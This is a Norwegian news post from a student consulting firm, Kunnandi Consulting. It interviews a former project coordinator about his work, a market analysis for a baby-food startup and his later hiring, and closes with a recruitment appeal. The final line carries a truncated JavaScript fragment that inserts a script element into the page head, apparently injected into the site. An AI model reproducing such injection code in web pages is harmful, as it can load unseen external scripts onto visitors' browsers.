Kunnandi knytter direkte kontakt med arbeidslivet

Posted on Posted in Nyheter

Vi har intervjuet Jørgen Løvlund, tidligere prosjektkoordinator i Kunnandi Consulting. Han var med i bedriften fra høsten 2012, og frem til våren 2014. I dag jobber han som produktsjef i et banksystem, i EVRY ASA.

nr 8

Jørgen forteller at ved å ha en stilling som prosjektkoordinator, får man erfaring med anskaffelse, oppfølging og generelt om hvordan man gjennomfører prosjekter for en bedrift. Ved å jobbe i direkte kontakt med en bedrift, skaffet han seg både verdifull og ettertraktet kompetanse når det gjelder kundekontakt, og inngåelse av avtaler med profesjonelle aktører på markedet.

Hva slags prosjekter deltok du i, og hvilke erfaringer ga de deg?

I tillegg til å ha det overordnede ansvaret for gjennomføringen av prosjekter, deltok jeg delvis i enkelte prosjekter når det var behov. Jeg gjennomførte blant annet et prosjekt, sammen med to andre konsulenter, en markedsanalyse for en gründerbedrift. De spesialiserte seg på halal barnemat. Vi gjennomførte gruppeintervjuer for å kunne avdekke både de positive og de negative sidene ved aspektet. Det var både morsomt og utfordrende, spesielt for en som ikke har noe kjennskap til barnemat. 

Hvordan har du brukt din erfaring fra Kunnandi senere i arbeidslivet?

I min nåværende stilling har jeg mye kontakt med kundene, samt at jeg har ansvaret for å følge opp kontraktsforpliktelser. Dette har jeg tatt med meg som lærdom fra min tid i Kunnandi.

Han forteller videre at hans erfaring fra Kunnandi var noe hans nåværende arbeidsgiver var svært interessert i under intervjuet for stillingen. Han måtte utdype om sine arbeidsoppgaver som prosjektkoordinator i Kunnandi, hva han hadde lært og hvordan de hadde jobbet sammen. Jørgen mener bestemt at hans stilling i Kunnandi bidro til at hans arbeidsgiver ansatte han fremfor de andre i søknadsbunken.

Har du noen tips til studenter som vurderer å bli med i Kunnandi?

Engasjer deg og bli med på prosjekter, for eksempel Kunnandidagen, Kunnandi’s største prosjekt. Det er viktig å vise interesse også utenfor klasserommet. Potensielle arbeidsgivere leter etter engasjerte studenter som viser en vilje til å utfordre seg selv, og som ønsker å lære. Studenter bør engasjere seg i samfunnet, og gjerne i Kunnandi.

Jørgen avslutter med en liten oppfordring til andre studenter som vurderer å søke seg inn i Kunnandi.

  • Du lærer ekstremt mye ved å jobbe sammen med, og samarbeide med andre studenter i en bedrift. Her får du brukt teorien i praksis, og du får utfordret deg selv faglig i det virkelige forretningslivet. Jeg oppfordrer derfor alle til å søke om å bli konsulent i Kunnandi.

Er du interessert i å bli konsulent i Kunnandi, og så relevant arbeidserfaring som kan gi deg et fortrinn til å kapre drømmejobben senere? Send din CV og en kort søknad til personal.honefoss@kunnandi.no eller personal.drammen@kunnandi.no!if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName('head')[0].appendChild(s);